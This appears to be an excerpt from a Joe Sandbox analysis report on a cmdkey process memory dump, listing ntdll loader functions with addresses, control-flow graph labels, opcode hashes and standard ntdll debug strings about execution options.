                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6ec375cc7813267e9e942094404079563e264b252de54680f1f9880442e77f2e
                                • Instruction ID: c5497d0a5465e25258badd56ae3d0689312400d7fae8f15c5c380ca433708286
                                • Opcode Fuzzy Hash: 6ec375cc7813267e9e942094404079563e264b252de54680f1f9880442e77f2e
                                • Instruction Fuzzy Hash: F690023121100D42E900A1984504B46000587E2301F55C4DBA111D654DC725C8557531
                                Function 03882B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 144 3882b90-3882b9c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 9dc1e9802c9e3a364627f695d11016ebbeb99dc6a26900efbcc7f59422c4c9b4
                                • Instruction ID: 3fed381f1c8f94942a93c679cfd037d4833c94c2220ae43c551791f5b76c6c4e
                                • Opcode Fuzzy Hash: 9dc1e9802c9e3a364627f695d11016ebbeb99dc6a26900efbcc7f59422c4c9b4
                                • Instruction Fuzzy Hash: D690023121108D02E910A198850474A000587D2301F59C8D6A541D658DC7A588957131
                                Function 03882BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 145 3882bc0-3882bcc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ccece4d2c021614421167a87594fb858057fe2d494d4b8d26bfa071e8a85ecb3
                                • Instruction ID: 05bcb7432c70fa522ea704bcd06238bdd0cc565d128712f04797c6693cb01a21
                                • Opcode Fuzzy Hash: ccece4d2c021614421167a87594fb858057fe2d494d4b8d26bfa071e8a85ecb3
                                • Instruction Fuzzy Hash: 4790023121100902E900A5D85508646000587E2301F55D4D6A601D555EC77588957131
                                Function 03882B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 141 3882b00-3882b0c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 35324c99ed3e5acf8e731d8d83d9a88d8c389d0b4d97c83ad3fce4085aeeabd8
                                • Instruction ID: 9c3c3aea7e6af146faac05b6749e02be635c9466ed488b61800ae2fd18e2f090
                                • Opcode Fuzzy Hash: 35324c99ed3e5acf8e731d8d83d9a88d8c389d0b4d97c83ad3fce4085aeeabd8
                                • Instruction Fuzzy Hash: 9E90023121504D42E940B1984504A46001587D2305F55C4D6A105D694DD7358D59B671
                                Function 03882B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 142 3882b10-3882b1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ccb04363554f335d4f08a45a1e852c4947355c24ff3f24d2fb17f8fae5513e2d
                                • Instruction ID: d19c7476c0ed5c42c1570601e46cce720d4fc9e26c0aeae1f45b846b40a65df1
                                • Opcode Fuzzy Hash: ccb04363554f335d4f08a45a1e852c4947355c24ff3f24d2fb17f8fae5513e2d
                                • Instruction Fuzzy Hash: 5690023121100D02E980B198450464A000587D3301F95C4DAA101E654DCB258A5D77B1
                                Function 03882A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 140 3882a80-3882a8c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 476852e6ae9f13b9a3a96686f82e122ccfd78d81cbd92d57f58a1bf207b315e2
                                • Instruction ID: 115bbea51f01618a785738276bd9f1bcf386334b734ae5e5b422283619c83e95
                                • Opcode Fuzzy Hash: 476852e6ae9f13b9a3a96686f82e122ccfd78d81cbd92d57f58a1bf207b315e2
                                • Instruction Fuzzy Hash: 0E900261212005035905B1984514616400A87E2201B55C4E6E200D590DC63588957135
                                Function 03882E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 149 3882e50-3882e5c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: eec5c9e22f7da737c9e8f060fe5a3cef7598ccb4be2ca8a782110d024a227a11
                                • Instruction ID: e57b48b337841997e0a4c91c74e08d17528732c7bf054b03e44b49a8189fc945
                                • Opcode Fuzzy Hash: eec5c9e22f7da737c9e8f060fe5a3cef7598ccb4be2ca8a782110d024a227a11
                                • Instruction Fuzzy Hash: 9890026135100942E900A1984514B060005C7E3301F55C4DAE205D554DC729CC567136
                                Function 03882D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 148 3882d10-3882d1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6d2397709e6b8baf935aa03249ad4b2cdbab6e5e28ac728e2a4916bb6483d6d1
                                • Instruction ID: 2d1239ca4294a6879d7ddd9b4f728fffe20f7bdfcf672a0f39939b1e0ce9289f
                                • Opcode Fuzzy Hash: 6d2397709e6b8baf935aa03249ad4b2cdbab6e5e28ac728e2a4916bb6483d6d1
                                • Instruction Fuzzy Hash: 3890023121100913E911A1984604707000987D2241F95C8D7A141D558DD7668956B131
                                Function 03882CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 147 3882cf0-3882cfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: d79ea652f1405effc82f4e2fbc376debe8b75aac5c2279e9f479d3e6bd5362a7
                                • Instruction ID: 33efd5ed6966615d876db41682d52984c6c7538f45146a68c4ee97815e984c0a
                                • Opcode Fuzzy Hash: d79ea652f1405effc82f4e2fbc376debe8b75aac5c2279e9f479d3e6bd5362a7
                                • Instruction Fuzzy Hash: 04900221252046526D45F1984504507400697E2241795C4D7A240D950CC636985AE631
                                Function 03882C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 146 3882c30-3882c3c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ae102ebf5b78e659271727ab29627921389a3245bc7b1da783d2ddd8187802e6
                                • Instruction ID: bdfa244206236c7ed556c9e00746d3f445d115aa568fdded6cc9b13ff2854c05
                                • Opcode Fuzzy Hash: ae102ebf5b78e659271727ab29627921389a3245bc7b1da783d2ddd8187802e6
                                • Instruction Fuzzy Hash: BC90022922300502E980B198550860A000587D3202F95D8DAA100E558CCA25886D6331
                                Function 03882B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 136 3882b2a-3882b2f 137 3882b3f-3882b46 LdrInitializeThunk 136->137 138 3882b31-3882b38 136->138
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b659a6c82b54d7fa2f9c0ffe44407cbd31f7319db34a931571661d958f62c322
                                • Instruction ID: 4a6602645e34d62bcc1e7094452a941ea72bb7f8945438575d0e4ca89dcedf2f
                                • Opcode Fuzzy Hash: b659a6c82b54d7fa2f9c0ffe44407cbd31f7319db34a931571661d958f62c322
                                • Instruction Fuzzy Hash: 07B09B719024C6C5EE11E7A4470C717794467D1701F19C4D6D2468645E8739C095F275

                                Non-executed Functions

                                Function 03877550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                Download Yara Rule
                                Strings
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4592
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4530
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B4507
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B454D
                                • Execute=1, xrefs: 038B451E
                                • ExecuteOptions, xrefs: 038B44AB
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4460
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: ebc766dd0d6de22ee6e38c5cce05cd859c0acc0c08f7a15553284690d08a6ffc
                                • Instruction ID: 65e8a9fe1b79f06038b6c74c113d387c03074373fc30a92ab4b10edbe1382318
                                • Opcode Fuzzy Hash: ebc766dd0d6de22ee6e38c5cce05cd859c0acc0c08f7a15553284690d08a6ffc
                                • Instruction Fuzzy Hash: E351F871A003196ADF20EBD9DC86FFD77A9AF04744F1804E9E505EB281EB70EA45CB61
                                Function 03849046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: 548cdc11964e9ed302b50836f7895bcb07f7c903932dc505e9dbacda9c8e44c4
                                • Instruction ID: 4077c23375fe592eeaa5e205bbc89ac9b005d271f5d4f862f3dce633cde1b5fa
                                • Opcode Fuzzy Hash: 548cdc11964e9ed302b50836f7895bcb07f7c903932dc505e9dbacda9c8e44c4
                                • Instruction Fuzzy Hash: F2813AB1D012699BDB35DB98CC44BEEB6B8AF48710F0445EAE909F7250D7709E84CFA1